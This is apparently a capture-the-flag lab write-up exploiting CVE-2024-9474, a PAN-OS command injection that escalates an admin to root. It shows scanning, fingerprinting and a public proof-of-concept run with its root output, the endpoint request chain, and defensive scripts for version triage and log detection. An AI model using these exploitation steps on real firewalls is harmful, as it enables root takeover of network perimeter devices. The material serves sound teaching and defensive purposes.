PwnOS: From Admin to Root—Exploiting CVE-2024-9474

Walk through CVE-2024-9474, a PAN-OS privilege escalation flaw enabling command injection from admin to root. Includes PwnOS demo, exploitation steps, and defense tips.

diskordia End_Of_File, Oct 08, 2025

PwnOS is a Very Easy Linux machine (Enterprise exclusive) that demonstrates exploiting CVE-2024-9474, a privilege escalation vulnerability affecting Palo Alto Networks PAN-OS web management. 

The flaw enables an authenticated PAN-OS admin to perform command injection via the createRemoteAppwebSession.php endpoint and execute commands with root privileges. 

This post will walk you through the CVE, service discovery, PAN-OS fingerprinting, exploitation, and defensive guidance.

  • Category: Network device exploitation

  • Platform: PAN-OS (Firewall)

  • Focus: Command Injection, Version Fingerprinting, Privilege Escalation

What is CVE-2024-9474?

  • Type: Privilege Escalation via command injection

  • Affected: PAN-OS 10.1, 10.2, 11.0, 11.1, 11.2

  • Privileges required: Administrator access to the management UI

  • Impact: Execute commands as root

The vulnerable flow abuses createRemoteAppwebSession.php. Crafted input is executed server-side, and output is redirected to a web-accessible path for retrieval.

CVE-2024-9474 is a privilege-escalation vulnerability that allows command injection when an attacker can supply crafted input to the PAN-OS web management endpoint createRemoteAppwebSession.php.

The vulnerability requires administrative access to the management UI—but when the management plane is exposed or admin accounts are poorly protected, that prerequisite becomes trivial to meet. Successful exploitation results in execution of arbitrary shell commands as root, with the output often redirected to a web-accessible path (e.g., /unauth/1.php), providing an easy retrieval channel for attackers.

Here’s why this matters: a management-plane compromise on firewalls lets attackers read configurations, harvest credentials, and persist backdoors—all from a device that sits at the network perimeter. Treat any management-plane vulnerability as high priority.

Skills you’ll use

  • Networking basics: Port scanning, service enumeration.

  • Web analysis: Reviewing HTTP responses, endpoints.

  • Exploitation: Command injection with constrained payloads.

  • Tooling: nmap, PAN-OS fingerprinting utilities.

  • Defense: Patching, access control, monitoring.

Recon and fingerprinting

Start with a full TCP scan to identify exposed services and the management interface. The command used in the lab was:

sudo nmap -p- -Pn -T4 --min-rate=1000 -sC -sV 10.129.241.233

The results reveal:

  • 22/tcp: OpenSSH 8.0

  • 443/tcp: HTTPS with PAN-OS branding in the certificate and resources

Opening the management interface in a browser confirms PAN-OS branding on the login page:

(Screenshot: Palo Alto Networks PAN-OS admin login page)

PAN-OS fingerprinting

To determine the running software version, we use panos-scanner by noperator.

git clone https://github.com/noperator/panos-scanner.git

cd panos-scanner

python3 panos-scanner.py -s -t https://10.129.241.233/ -cve | jq

Typical output for this target identifies:

{
  "target": "10.129.241.233",
  "match": {
    "date": "2024-02-08",
    "versions": ["10.2.8"],
    "precision": "approximate",
    "resource": "login/images/favicon.ico"
  },
  "cvelink": "https://security.paloaltonetworks.com/?product=PAN-OS&sort=-cvss"
}

The fingerprint points to PAN-OS 10.2.8, which is within the range of builds impacted by CVE-2024-9474. Always cross-check fingerprinted versions against the vendor advisory before taking action on production systems.

Exploitation flow

The vulnerability can be reproduced using a public proof-of-concept. The PoC used in the lab is cloned and run as follows:

git clone https://github.com/k4nfr3/CVE-2024-9474.git

cd CVE-2024-9474

python3 exploit_fw.py 10.129.241.233 "id"

Expected run (abbreviated):

POST : https://10.129.241.233/php/utils/createRemoteAppwebSession.php/1.js.map
Status Code: 200
PHPSESSID: j45ovng8jc2ennka0lni3ia733

GET : https://10.129.241.233/index.php/.js.map
Status Code: 200

GET : https://10.129.241.233/unauth/1.php
Status Code: 200
Status Content: b'uid=0(root) gid=0(root) groups=0(root)\n'

The output shows uid=0(root), confirming root-level command execution. Note that payloads may be subject to length limits; the PoC handles this by using short commands or staged writes.

You can now issue constrained commands and retrieve their output from /unauth/1.php.

Flag retrieval (Demonstration)

To demonstrate practical impact, the PoC can be used to read files as root, such as a typical root flag on a lab box:

python3 exploit_fw.py 10.129.241.233 "cat /root/flag.txt"

# ...

Status Content: b'b9aa<SNIP>\n'

Again: this is a lab demonstration. Do not run the PoC against systems you do not own or have explicit permission to test.

Under the hood

Broken down, the issue comes down to three failure points:

  • Endpoint abuse: createRemoteAppwebSession.php accepts user-controlled data that isn’t properly sanitized.

  • Command injection: Injected shell commands are executed server-side in a context with elevated privileges.

  • Output redirection: Command results are written to a web-accessible path (e.g., /unauth/1.php) and can be fetched over HTTPS.

High-level request flow:

1. POST /php/utils/createRemoteAppwebSession.php/1.js.map

   └── Inject command via vulnerable parameter

2. GET /index.php/.js.map

   └── Trigger execution

3. GET /unauth/1.php

   └── Retrieve command output

Length constraints and input sanitization issues can be worked around by splitting payloads or using short commands. The critical point is that, once the output is redirected to /unauth/, an attacker can easily fetch it remotely.

Defensive guidance

1. Patch immediately

Follow the vendor advisory and apply the official hotfixes for affected PAN-OS builds.

  • PAN-OS 10.1: >= 10.1.3-h4

  • PAN-OS 10.2: >= 10.2.0-h4

  • PAN-OS 11.0: >= 11.0.0-h4

  • PAN-OS 11.1: >= 11.1.0-h4

  • PAN-OS 11.2: >= 11.2.0-h1
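The hotfix list above is easy to misread: a -hN hotfix belongs to one specific maintenance release (10.2.0-h4 is a hotfix on 10.2.0, not a floor for the whole 10.2 branch), so a build such as 10.2.8 is neither proven fixed nor proven vulnerable by this table alone. The following inventory check is an added example written for this post, not code from Hack The Box or from Palo Alto Networks. It seeds its table with only the five entries listed above, treats an affected branch whose maintenance release is not in the table as "consult the advisory" rather than assuming it is patched, and uses a constructed sample inventory; the hostnames are made up.

```python
import re
from typing import Dict, List, Tuple

# Earliest hotfixed release per branch, copied from the list in this write-up.
# A hotfix number is tied to the maintenance release it names, so the table is
# keyed by the exact (major, minor, maint) triple; add the entry for your own
# maintenance release from the vendor advisory before relying on the result.
FIXED_HOTFIX: Dict[Tuple[int, int, int], int] = {
    (10, 1, 3): 4,   # 10.1.3-h4
    (10, 2, 0): 4,   # 10.2.0-h4
    (11, 0, 0): 4,   # 11.0.0-h4
    (11, 1, 0): 4,   # 11.1.0-h4
    (11, 2, 0): 1,   # 11.2.0-h1
}
AFFECTED_BRANCHES = {(10, 1), (10, 2), (11, 0), (11, 1), (11, 2)}

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-h(\d+))?$")


def parse_panos_version(version: str) -> Tuple[Tuple[int, int, int], int]:
    """Split '10.2.0-h4' into ((10, 2, 0), 4); a build with no hotfix gets hotfix 0."""
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised PAN-OS version string: {version!r}")
    major, minor, maint, hotfix = m.groups()
    return (int(major), int(minor), int(maint)), int(hotfix or 0)


def assess(version: str) -> str:
    """Classify one version string against the local hotfix table."""
    release, hotfix = parse_panos_version(version)
    if release[:2] not in AFFECTED_BRANCHES:
        return "not-affected"
    required = FIXED_HOTFIX.get(release)
    if required is None:
        # Affected branch, but this maintenance release has no entry locally.
        # A higher maintenance number does not imply the fix is present.
        return "unknown-check-advisory"
    return "fixed" if hotfix >= required else "vulnerable"


def triage_inventory(inventory: List[Tuple[str, str]]) -> Dict[str, str]:
    """Map each (hostname, version) pair to its status."""
    return {host: assess(ver) for host, ver in inventory}


if __name__ == "__main__":
    # Constructed sample inventory; these are not real devices.
    SAMPLE_INVENTORY = [
        ("fw-edge-01", "10.2.0-h4"),
        ("fw-edge-02", "10.2.0"),
        ("fw-dc-01", "10.2.8"),
        ("fw-lab-01", "9.1.16"),
    ]
    for host, status in triage_inventory(SAMPLE_INVENTORY).items():
        print(f"{host}: {status}")
```

The "unknown-check-advisory" outcome is the one that matters operationally: it is exactly the case of the lab target (10.2.8 on an affected branch), and the script refuses to call it either way until the advisory entry for that maintenance release is added to the table.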

2. Restrict management plane

Limit UI/API access to trusted IP ranges and management networks. Place PAN-OS management interfaces behind jump hosts or VPNs where possible.

3. Require stronger admin authentication

Enforce MFA for admin accounts and avoid shared credentials. Rotate default credentials and apply least privilege on admin roles.

4. Harden and monitor

Enable comprehensive admin action logging. Watch for POSTs to /php/utils/createRemoteAppwebSession.php and GETs to /unauth/*. Alert on unexpected files appearing under /unauth/ and on POST bodies containing shell metacharacters or unusual base64 blobs.
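The three-step request flow described under "Under the hood" and the monitoring advice just above translate directly into a log rule: a POST to the session endpoint followed, from the same source and within a short window, by a successful GET under /unauth/. The script below is an added example written for this post, not tooling from Hack The Box or the PoC author. It runs over a constructed sample in Apache combined log format (the IPs and timestamps are made up and the exact layout of the PAN-OS management web-server log may differ, so the regex is an assumption to adapt), and it deliberately ranks a lone /unauth/ probe lower than the full chain.

```python
import re
from datetime import datetime, timedelta
from typing import Dict, List, Optional, Tuple

# Constructed sample lines (Apache combined format), not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [08/Oct/2025:10:14:02 +0000] "POST /php/utils/createRemoteAppwebSession.php/1.js.map HTTP/1.1" 200 512 "-" "python-requests/2.32"
203.0.113.7 - - [08/Oct/2025:10:14:03 +0000] "GET /index.php/.js.map HTTP/1.1" 200 0 "-" "python-requests/2.32"
203.0.113.7 - - [08/Oct/2025:10:14:04 +0000] "GET /unauth/1.php HTTP/1.1" 200 48 "-" "python-requests/2.32"
198.51.100.9 - - [08/Oct/2025:10:20:11 +0000] "GET /php/login.php HTTP/1.1" 200 9831 "-" "Mozilla/5.0"
198.51.100.9 - - [08/Oct/2025:10:20:15 +0000] "POST /php/login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.44 - - [08/Oct/2025:11:02:30 +0000] "GET /unauth/1.php HTTP/1.1" 404 0 "-" "curl/8.5"
"""

# Assumed log layout; adjust the pattern to what the appliance actually emits.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
SESSION_ENDPOINT = "/php/utils/createRemoteAppwebSession.php"
OUTPUT_PREFIX = "/unauth/"
WINDOW = timedelta(minutes=5)   # how close the GET must follow the POST

Finding = Tuple[str, str, str]   # (severity, source_ip, reason)


def parse_line(line: str) -> Optional[Dict[str, object]]:
    """Parse one access-log line; return None for lines that do not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": m["ip"], "ts": ts, "method": m["method"],
            "path": m["path"], "status": int(m["status"])}


def detect(log_text: str) -> List[Finding]:
    """Emit findings for session-endpoint POSTs and /unauth/ fetches, correlated by source IP."""
    findings: List[Finding] = []
    last_post: Dict[str, datetime] = {}   # ip -> time of most recent endpoint POST
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        ip, path, ts = rec["ip"], rec["path"], rec["ts"]
        if rec["method"] == "POST" and path.startswith(SESSION_ENDPOINT):
            last_post[ip] = ts
            findings.append(("medium", ip, f"POST to {SESSION_ENDPOINT}"))
        elif path.startswith(OUTPUT_PREFIX):
            posted = last_post.get(ip)
            if posted is not None and rec["status"] == 200 and ts - posted <= WINDOW:
                # Full chain: inject, then fetch output from the web-accessible path.
                findings.append(("high", ip,
                                 f"GET {path} served 200 within {WINDOW} of session-endpoint POST"))
            else:
                # A bare probe of /unauth/ is still unusual on a management plane.
                findings.append(("low", ip, f"GET {path} -> {rec['status']}"))
    return findings


if __name__ == "__main__":
    for severity, ip, reason in detect(SAMPLE_LOG):
        print(f"[{severity}] {ip}: {reason}")
```

Access logs do not carry request bodies, so the shell-metacharacter and base64 checks mentioned above need a source that does (a WAF or reverse proxy in front of the management interface, or PAN-OS's own admin activity logging); a file-integrity alert on new files under /unauth/ covers the same chain from the host side.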

5. Programmatic hygiene

Subscribe to vendor advisories, maintain an appliance inventory with version mapping, and establish a regular patch cadence combined with pre-deployment testing.

4 key takeaways

  • PAN-OS management vulnerabilities are high-impact. When the management plane is exposed, an authenticated admin bug can quickly turn into a full appliance compromise.

  • Accurate fingerprinting and targeted exploitation can yield root access rapidly when a vulnerable build is present.

  • Simple output redirection turns limited command injection into a full read/exfiltration primitive.

  • Defenses are straightforward but must be enforced: patch promptly, segment management, require MFA, and monitor for the request/output patterns described.
